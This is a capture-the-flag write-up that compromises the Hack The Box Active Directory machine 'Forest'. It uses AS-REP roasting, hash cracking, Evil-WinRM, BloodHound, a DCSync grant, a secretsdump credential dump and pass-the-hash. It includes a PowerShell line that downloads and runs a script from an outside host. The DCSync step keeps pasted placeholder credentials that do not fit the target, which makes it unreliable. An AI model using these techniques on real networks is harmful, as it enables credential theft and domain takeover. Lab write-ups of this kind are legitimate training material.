Forest
Quick Summary
Hey guys, here’s my write-up about Forest Box it was a great box and very realistic
started with enumerating users over RPC, attack Kerberos with AS-REP Roasting
and a privilege escalation is possible when our user is in Exchange Windows permissions security group
Recon
Nmap
Start with scanning all ports
nmap -p- 10.10.10.161 --min-rate=10000
then enumerate version
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:19 EET
Warning: 10.10.10.161 giving up on port because retransmission cap hit (10).
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.30s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49703/tcp open unknown
49924/tcp open unknown
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:25 EET
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.38s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-21 12:36:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/21%Time=5F9028C8%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m36s, deviation: 4h02m32s, median: 10m34s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-10-21T05:38:46-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-21T12:38:45
|_ start_date: 2020-10-21T11:54:04
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 293.67 seconds
looks like we are dealing with a domain controller
DNS Enumeration
can resolve htb.local and forest.htb.local from this DNS server
dig any @10.10.10.161 htb.local
; <<>> DiG 9.16.2-Debian <<>> any @10.10.10.161 htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55034
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 3ccc9f26efdc3210 (echoed)
;; QUESTION SECTION:
;htb.local. IN ANY
;; ANSWER SECTION:
htb.local. 600 IN A 10.10.10.161
htb.local. 3600 IN NS forest.htb.local.
htb.local. 3600 IN SOA forest.htb.local. hostmaster.htb.local. 100 900 600 86400 3600
;; ADDITIONAL SECTION:
forest.htb.local. 3600 IN A 10.10.10.161
;; Query time: 208 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: Wed Oct 21 18:38:38 EET 2020
;; MSG SIZE rcvd: 150
SMB Enumeration
Since we have netbios-ssn open on port 139 let’s run smbmap and see what we get.
If you’re not on kali you can get smbmap from here
smbmap -H 10.10.10.161
[+] Finding open SMB ....
[+] User SMB session establishd on 10.10.10.161...
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
Disk Permissions
---- -----------
[!] Access DeniedI also tried smbclient but got nothing
smbclient -N -L //10.10.10.161
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
RPC Enumeration
Here, we can see MSRPC port 135 is open so we can enumerate information out of AD using rpcclient and null authentication
rpcclient -U "" -N 10.10.10.161 to get a list of users we useenumdomusers
rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]and we can list groups also
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
AS-REP Roasting
So what is AS-REP Roasting attack:
technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication. If the user has “Do not use Kerberos pre-authentication” enabled, then an attacker can recover a Kerberos AS-REP encrypted with the users RC4-HMAC’d password and he can attempt to crack this ticket offline.
By default, Do Not Require Pre-Authentication is disabled for the domain user.
I have a list of accounts from my RPC enumeration above.
cat users
svc-alfresco
sebastien
lucinda
andy
mark
santi
Administratornow we can use GetNPUsers.py from Impacket to try to get a hash for each user, and I find one for the svc-alfresco account:
GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/ -usersfile users
$krb5asrep$23$svc-alfresco@HTB:5b3dd5b04029f657ab282c0819f4db32$9d31baa165064b2f1bbdd08c710f1dff4f146a8fbb35d6ad96157388b6821845346cf135331baf023a08f42da56597dea93859534bcec0a4e2830ad03faf667d231bb6cedb8992462c16c9e048aef8bb55ab7c3c45d53068b60b6b1677795664476eab5b01525cd23cb793b38fe8c357bcd635e938a46b20c6c596c41141a027fddb86b7480aa4df7ed91d91dd6a6efc94f400d2d159d52e9dc32be28ff50b6dbf6cdc228bf3e841073ea644d526fcb08e1472bb796ac7fa831598b73f8509d9bc5f68c14c17879df8dfbbf035ec4553d279c336cf4dca3b52c747a966fb6036
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH setCrack Hash
Now I can use hashcat to break the hash:
we get password s3rvice
hashcat -m 18200 alfresco.kerb /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$svc-alfresco@HTB:4479d427f1cbdc2b8cf00073ad70141d$7236f2b86d80ff1cd2feac6f8e6b7b2438e353e9e90d7e3988212235bd14d81eaedeafe9f78a10159c08df738674896586f9c42badb21557db914ec859c16060de1d61687d4ec20f1b4e644520815518408858ee04c1b3aabecbbbe08030dbaf49a82bebacbad772e8af4bd51b31305d636bdfda8af8aa3886350cdbeb4cc90fb45691d68431248b0f236faae01016399580c2efa8a64dd59980c5987a78121dce24bd20016b46e79b515f32bfd125abe8265a285c30e403030613e8362bb3abb7d829364b2a3979f0a0b728835446a2c48e572190b46afcb23544552ee1dd55:s3rviceWinRM
now we can use Evil-WinRM to connect to the box
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> From here I can grab user.txt:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47a************************Privesc to Administrator
Enumeration
I used SharpHound to collect data for BloodHound.
so what is BloodHound:
BloodHound is a tool for visualizing an Active Directory environment as a graph. This representation then offers all the power of graph theory to unravel new attack paths.
It can be used on engagements to identify different attack paths in Active Directory (AD), this encompasses access control lists (ACLs), users, groups, trust relationships and unique AD objects. The tool can be leveraged by both blue and red teams to find different paths to targets. The subsections below explain the different and how to properly utilize the different ingestors
let's upload it and invoke it
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/21/2020 3:58 PM 15312 20201021155757_BloodHound.zip
-a---- 10/21/2020 3:58 PM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
now we will download the results to my box actually evil-winrm made it easy through the command download
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20201021155757_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20201021155757_BloodHound.zip to 20201021155757_BloodHound.zip
Info: Download successful!you can install bloodhound from here
https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/you can pull the data file to bloodhound or use upload button
In querries field you can request user, domain or group to see which is link with which.
for example svc-alfresco@htb.local right click on “shortest path to go here” and you will see domain user and group linked with svc-alfresco user.
I’ll click “Find Shorter Paths to Domain Admin”, and get the following graph:
Exchange and high privileges
Because my user is in Service Account, which is a member of Privileged IT Account, which is a member of Account Operators, it’s basically like my user is a member of Account Operators. And Account Operators has Generic All privilege on the Exchange Windows Permissions group.
I found this great article post-blog to abusing Exchange
in bloodhound we can click “Abuse Info” tab in the pop up that displays:
Grant DCSync Privileges
first we will add our user to "Exchange Windows Permissions" group
net group "Exchange Windows Permissions" svc-alfresco /add /domainwe will upload powerview and invoke it to complete our attack
iex(new-object net.webclient).downloadstring("http://10.10.16.136:8080/PowerView.ps1")$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSyncAnd I can see the user in the new group:
*Evil-WinRM* PS C:\> net group 'Exchange Windows Permissions'
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
svc-alfresco
The command completed successfully.I run secretsdump.py to get hashes:
secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
[*] Cleaning up...
Shell
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
And we owned root ! That’s it ,
Feedback is appreciated !
Last updated
Was this helpful?